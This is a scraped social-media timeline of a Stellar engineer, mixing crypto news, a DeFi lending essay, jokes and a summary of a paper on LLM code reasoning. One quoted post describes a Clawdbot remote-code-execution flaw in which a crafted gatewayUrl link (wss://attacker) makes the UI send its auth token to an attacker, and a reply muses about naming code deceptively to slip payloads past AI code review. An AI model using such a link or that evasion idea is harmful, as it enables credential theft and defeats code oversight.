Nicolas Barry

346 posts

@nicolassf

Stellar dude

Joined October 2009
92 Following 337 Followers
Nicolas Barry
Nicolas Barry@nicolassf·
With the way things are evolving in the geo-political and security front in particular, I think we need blockchains and open networks more than ever. Latest in the series are some of my thoughts on what we can do about it. Be sure to read previous posts for context: stellar.org/blog/developer…
Nicolas Barry
Nicolas Barry@nicolassf·
@rohanpaul_ai I wonder if the underlying issue can be exploited in adversarial ways: pick deceiving variable/function names to degrade model performance with the purpose of obfuscating some bad payload that will pass “AI code review”
Rohan Paul
Rohan Paul@rohanpaul_ai·
"Can LLM agents explore codebases and reason about code semantics without executing the code?" Meta discovered that if you force an LLM to show its reasoning step by step with proof, its code patch error rate drops by nearly 50%. The finding is not that models suddenly became deeper thinkers. It is that many code errors come from premature recognition: the model sees a familiar name, such as format, and quietly substitutes the usual meaning before checking the project’s actual files. If you just ask a standard LLM to check the code without running it, the model usually just glances at the function names and makes a confident guess. The paper talks about how when asked to compare 2 different code fixes, the standard AI saw a common word and assumed it meant the normal system tool. Because it skipped reading the actual files, the AI completely missed that this specific project had created its own custom tool with the exact same name. Meta solves this by using a mandatory checklist template that prevents the model from skipping ahead. The model must explicitly write down what the code modifies, trace the exact execution path, and prove its conclusion with specific evidence. This simple change forces the AI to actually read the local files and follow the real logic instead of relying on assumptions. This method pushed accuracy to 93% on real code patches without needing any expensive new training or complex systems. Overall, it shows that a basic structured prompt can give you highly reliable code verification without the massive computational cost of actually running the software tests. ---- Paper Link – arxiv.org/abs/2603.01896 Paper Title: "Agentic Code Reasoning"
Nicolas Barry retweeted
FranceNews24
FranceNews24@FranceNews24·
📹 VIDEO - #Insolite: During a claw trimming, one marmot seems to have already accepted its fate… while the other panics at every snip. A scene as funny as it is totally theatrical.
Nicolas Barry retweeted
kanav
kanav@kanavtwt·
Someone built a Google translate for Linkedin 😭
Nicolas Barry retweeted
Matt Kreiser
Matt Kreiser@KreiserMatt·
.@StellarOrg Q4 2025: Everything you need to know on RWAs. In 2025, the market cap of RWAs on Stellar increased 196% from $301.1 million to $890.2 million, driven primarily by the issuance of new assets such as treasuries from @Spiko_finance and real estate from @RedSwanDigital, alongside the growth of @FTDA_US's U.S. Government Money Fund (BENJI) and @etherfuse’s government debt offerings.
Nicolas Barry retweeted
Dmitrii Kovanikov
Dmitrii Kovanikov@ChShersh·
I've just seen the worst enum in my life
Nicolas Barry
Nicolas Barry@nicolassf·
Want some bread with your slop bisque? Exciting times to see how we’re going to speed run engineering practices - the ride may be bumpy so not for the faint of heart
André Baptista@0xacb

🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…

Nicolas Barry retweeted
law dog, esq.
law dog, esq.@ggooooddddoogg·
achieving AGI by reducing the intelligence of the average human rather than increasing the intelligence of AI
Nicolas Barry retweeted
Stani
Stani@StaniKulechov·
Some misconceptions and paradoxes in DeFi lending: Lending is based on trust. This is the self-evident truth on which banking is built. Losing trust means losing capital, and that can cause bank runs or systemic collapses. The way to preserve trust is to create a system that is fundamentally risk-averse throughout the entire supply chain. Ignore this rule and you are effectively in the business of risk-taking, which is more akin to today’s hedge funds. DeFi lending protocols follow the same basic principles as banking. The fundamental difference between traditional finance and DeFi lending systems is that lending protocols encode trust mechanisms into the code for reasons like improving automation, capital efficiency, and liquidity provisioning etc. Some people have a flawed idea that if a lending protocol fixes parameters around trust, it will somehow improve trust. Of course, this does not make sense since you are simply moving trust from one place to another. From one market level to another, but not really improving the trust assumptions, at all in fact. You also cannot rely on fully immutable systems in dynamic marketplaces such as lending and borrowing. This is why comparing lending protocols to AMMs does not work either. Traders on AMMs do not depend on ongoing trust; their transactions are one-off trades, while borrowers and lenders maintain a relationship until the debt is repaid. Applying immutable parameters means the system cannot adapt to changing market conditions, and financial markets are nothing if not dynamic. It’s relatively straightforward to run immutable model during up cycle, however bear markets is where the true resiliency is tested out. Now, back to the idea of moving trust from one place to another. Since trust always exists in lending, and most markets will likely rely on some level of human involvement, the real question is: at what level and under what circumstances should that involvement occur? 
In isolated lending protocols like Aave, decision-making happens at the lowest level, close to the markets. This has benefits, such as ensuring that parameter decisions remain aligned with the protocol’s risk framework in a non-conflicted way. Risk managers are paid fixed fees to protect the protocol. If they fail, they get replaced, as we have seen before. In designs where human involvement is moved higher up and risk curators are incentivized based on fund performance, hidden issues can emerge that are highly detrimental to the system. First, the idea of risk curation as isolation is misleading. While markets may be separated, risk curators often share liquidity across markets by supplying to the same markets and comingling strategies. This means users can be exposed to the weakest curator or market in the system, with no capped protection. For example: Curator A supplies liquidity to markets B and C, while curator D supplies liquidity to markets C and E. If market E loses trust, for instance through a depeg event like xUSD or deUSD, it could trigger a bank run from market E, driving utilization to 100% and creating a race for withdrawals and even full insolvency. At the same time, LPs withdrawing from the curated vaults cause another bank run at the vault level, meaning markets B and C are affected too. As a result, curator A’s LPs, even those subscribed to less risky strategies, would also be impacted, intensifying the liquidity contagion, even if they didn’t supply the liquidity into the problematic market, creating protocol-wide bank run. This is my biggest concern with this type of design model: it leads to contagious liquidity effects that break trust while marketing some sort of risk isolation, which doesn’t in reality exist. It is especially problematic for RWAs, which require greater isolation due to their specific characteristics. The problem worsens when considering curator incentives. DeFi risk strategies are highly commoditized.
Lending against ETH or BTC is not particularly profitable or exciting for degens. So curators often go on the offensive, adding new types of collateral, sometimes untested or poorly understood. Other curators then rush to copy and allocate capital to these new markets. It becomes a speed race to capture reward at the cost of additional risk, much like hedge funds today operate. It’s especially problematic for integrators that are looking to run their own strategies, knowing they would be commingled with strategies run by riskier vault curators, making integrations more challenging. Also this design comes at the cost of liquidity segregation, without truly improving or isolating risk, while introducing potential systemic contagion on every bank run. Given the permissionless nature, we will see more events of contagions spread. It’s important for everyone to understand the mechanisms. DeFi is still relatively young, less than a decade old, and any large-scale issue could set the industry back significantly. We are close to building safe and secure DeFi, and we need to protect the users. Hope this is a good learning on how to build better DeFi. Just use Aave.
Nicolas Barry retweeted
mert
mert@mert·
you can't self-custody a stablecoin btw the central issuer of the stable can lock you out even while you hold it in your wallet this is, obviously, not possible with cash not to FUD stablecoins, which obviously have their use but this must be acknowledged
Nicolas Barry retweeted
Stellar
Stellar@StellarOrg·
Releases for Stellar Protocol 24 are now available. If you run Stellar infrastructure, make sure to install them ASAP! Oct 20: Stable releases available. Oct 21 at 2100 UTC: Testnet upgrade. Oct 22 at 1700 UTC: Mainnet upgrade vote. Check out the upgrade guide for more info on this stability upgrade that fixes a bug in the state archival feature in Stellar Core. stellar.org/blog/developer…